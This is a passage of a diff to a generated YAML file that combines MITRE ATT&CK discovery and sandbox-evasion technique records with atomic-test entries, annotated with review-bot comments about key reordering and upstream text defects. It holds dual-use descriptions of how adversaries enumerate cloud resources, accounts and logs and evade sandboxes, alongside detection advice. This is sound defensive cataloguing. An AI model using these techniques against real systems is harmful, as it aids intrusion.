+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1580:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Cloud Infrastructure Discovery
+ description: |-
+ An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+ Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+ An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Regina Elwell
- Praetorian
- Isif Ibrahima, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+ components. Monitor logs for actions that could be taken to gather information
+ about cloud infrastructure, including the use of discovery API calls by new
+ or unexpected users and enumerations from unknown or malicious IP addresses.
+ To reduce false positives, valid change management procedures could introduce
+ a known identifier that is logged with the change (e.g., tag or header) if
+ supported by the cloud provider, to help distinguish valid, expected actions
+ from malicious ones.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Instance: Instance Enumeration'
+ - 'Cloud Storage: Cloud Storage Enumeration'
+ - 'Volume: Volume Enumeration'
+ - 'Snapshot: Snapshot Enumeration'
type: attack-pattern
id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
created: '2020-08-20T17:51:25.671Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1580
url: https://attack.mitre.org/techniques/T1580
+ external_id: T1580
- source_name: Expel IO Evil in AWS
- url: https://expel.io/blog/finding-evil-in-aws/
description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
Evil in AWS. Retrieved June 25, 2020.
+ url: https://expel.io/blog/finding-evil-in-aws/
- source_name: AWS Head Bucket
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
14, 2022.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
- source_name: AWS Get Public Access Block
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
- source_name: AWS Describe DB Instances
- url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
- source_name: Amazon Describe Instance
- url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
description: Amazon. (n.d.). describe-instance-information. Retrieved March
3, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
- source_name: Amazon Describe Instances API
- url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
- source_name: Google Compute Instances
- url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
description: Google. (n.d.). gcloud compute instances list. Retrieved May
26, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
- source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
- source_name: Microsoft AZ CLI
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
- url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
- Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
- An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Infrastructure Discovery
- x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
- components. Monitor logs for actions that could be taken to gather information
- about cloud infrastructure, including the use of discovery API calls by new
- or unexpected users and enumerations from unknown or malicious IP addresses.
- To reduce false positives, valid change management procedures could introduce
- a known identifier that is logged with the change (e.g., tag or header) if
- supported by the cloud provider, to help distinguish valid, expected actions
- from malicious ones.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Instance: Instance Enumeration'
- - 'Cloud Storage: Cloud Storage Enumeration'
- - 'Volume: Volume Enumeration'
- - 'Snapshot: Snapshot Enumeration'
- x_mitre_attack_spec_version: 2.1.0
+ url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1580
atomic_tests:
- name: AWS - EC2 Enumeration from Cloud Instance
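Review bot: the T1580 `description` block is moved, not changed, so the two wording defects that appear identically in the `-` and `+` copies (`Adversaries have also may use infrastructure discovery APIs` and the missing space in `(Citation: Mandiant M-Trends 2020)An adversary`) come from the upstream ATT&CK text; do not hand-edit them in this generated file, report them upstream. The same applies to the `Microsoft AZ CLI` reference, whose description (`az ad user`) does not match the `az vm list` command it is cited for. The reference URL changes in this hunk (Mandiant M-Trends repointed to the `mandiant.com` PDF, the Deloitte link now ending in `/edit` with a September 2024 retrieval date) are upstream-driven and fine.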
@@ -50291,7 +50985,7 @@ discovery:
fi
T1217:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-16T14:24:40.625Z'
name: Browser Bookmark Discovery
description: |-
Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
@@ -50345,7 +51039,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1217
atomic_tests: []
T1016:
@@ -50375,7 +51068,7 @@ discovery:
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
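Review bot: the replacement text in this hunk is still not a rendered link and is now also malformed: `{{LinkById|T1059.008}` opens two braces and closes one. The previous `(LinkById: T1059.008)` was equally unrendered, so this is an unexpanded upstream template rather than a generator regression; if the generator already rewrites citation markup, have it expand `LinkById` into the markdown link form the same sentence uses for T1047 and T1059.001, otherwise report the unbalanced braces upstream so the detection text stops shipping with raw template syntax.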
@@ -50413,12 +51106,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016
atomic_tests: []
T1087:
technique:
- modified: '2024-01-12T23:36:56.245Z'
+ modified: '2024-10-15T15:35:28.784Z'
name: Account Discovery
description: |-
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -50445,14 +51137,13 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
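Review bot: T1087's platform list drops `Azure AD`, `Office 365` and `Google Workspace` and gains `Office Suite` and `Identity Provider`, with `x_mitre_version` bumped 2.4 → 2.5. As with T1087.003 above, this is the upstream platform consolidation and it changes which platform-filtered indexes this technique lands in; call it out in the PR description so downstream users know the per-platform indexes are not merely reformatted.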
@@ -50481,7 +51172,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1482:
technique:
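Review bot: T1087 ends with `x_mitre_modified_by_ref: identity--c78cb6e5-...` followed directly by `atomic_tests: []`, with no `identifier: T1087` line between them, whereas every other technique in this diff (T1087.003, T1482, T1083 and the rest) has `identifier:` immediately before `atomic_tests:`. Unless it sits outside the three lines of context shown, the generator is dropping the identifier for this technique; check the rendered YAML before merge.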
@@ -50541,7 +51231,7 @@ discovery:
.NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T19:18:22.305Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Trust Discovery
x_mitre_detection: |
@@ -50560,7 +51250,6 @@ discovery:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1482
atomic_tests: []
T1083:
@@ -50629,12 +51318,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1083
atomic_tests: []
T1049:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-09-06T22:35:34.231Z'
name: System Network Connections Discovery
description: "Adversaries may attempt to get a listing of network connections
to or from the compromised system they are currently accessing or from remote
@@ -50711,40 +51399,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1049
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
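Review bot: most of this hunk is key reordering rather than content change: `x_mitre_platforms`, `x_mitre_domains`, `x_mitre_contributors`, `id`, `type`, `created`, `created_by_ref` and `external_references` are deleted here and reappear with the same values in the following hunks for T1497, and the only substantive edit is `modified: '2024-09-12T15:50:18.049Z'`. If the generator can emit keys in a stable order, these forty-line churns shrink to a handful of lines and the real edits (such as the citation URL change for this object below) become visible at a glance.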
@@ -50756,6 +51415,10 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -50766,8 +51429,14 @@ discovery:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -50777,9 +51446,28 @@ discovery:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1619:
technique:
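Review bot: the Deloitte citation URL gains an `/edit` suffix, `url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit`, with the retrieval date moved to September 13, 2024; a Drive `/edit` link generally expects an authenticated Google session where the previous bare file link could be opened anonymously, so verify the new URL still resolves for an unauthenticated reader (the same change recurs for T1497.002 further down). The `x_mitre_attack_spec_version: 3.2.0` bump and the added `revoked: false` are consistent with the other migrated objects.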
@@ -50812,7 +51500,7 @@ discovery:
Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-11T22:29:43.677Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Cloud Storage Object Discovery
x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -50830,7 +51518,6 @@ discovery:
- 'Cloud Storage: Cloud Storage Enumeration'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1619
atomic_tests:
- name: AWS S3 Enumeration
@@ -50859,7 +51546,7 @@ discovery:
elevation_required: false
T1654:
technique:
- modified: '2023-09-30T22:18:46.711Z'
+ modified: '2024-10-15T12:24:40.892Z'
name: Log Enumeration
description: |-
Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -50867,11 +51554,14 @@ discovery:
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+ In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_contributors:
- Bilal Bahadır Yenici
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -50882,7 +51572,7 @@ discovery:
- macOS
- Windows
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -50896,6 +51586,10 @@ discovery:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1654
external_id: T1654
+ - source_name: Permiso GUI-Vil 2023
+ description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+ Cloud Threat Actor. Retrieved August 30, 2024.'
+ url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
- source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -50915,56 +51609,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1654
atomic_tests: []
T1087.004:
technique:
- x_mitre_platforms:
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
- type: attack-pattern
- created: '2020-02-21T21:08:36.570Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.004
- url: https://attack.mitre.org/techniques/T1087/004
- - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
- source_name: Microsoft msolrolemember
- - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
- 6, 2019.
- url: https://github.com/True-Demon/raindance
- source_name: GitHub Raindance
- - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Microsoft AZ CLI
- - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
- Directory Leaks via Azure. Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
- source_name: Black Hills Red Teaming MS AD Azure, 2018
- - source_name: AWS List Roles
- description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
- - source_name: AWS List Users
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
- description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
- - source_name: Google Cloud - IAM Servie Accounts List API
- url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
- description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
- August 4, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:51:18.808Z'
name: Cloud Account
description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
accounts are those created and configured by an organization for use by users,
@@ -50986,19 +51635,61 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+ created: '2020-02-21T21:08:36.570Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1087/004
+ external_id: T1087.004
+ - source_name: AWS List Roles
+ description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+ - source_name: AWS List Users
+ description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+ - source_name: Black Hills Red Teaming MS AD Azure, 2018
+ description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
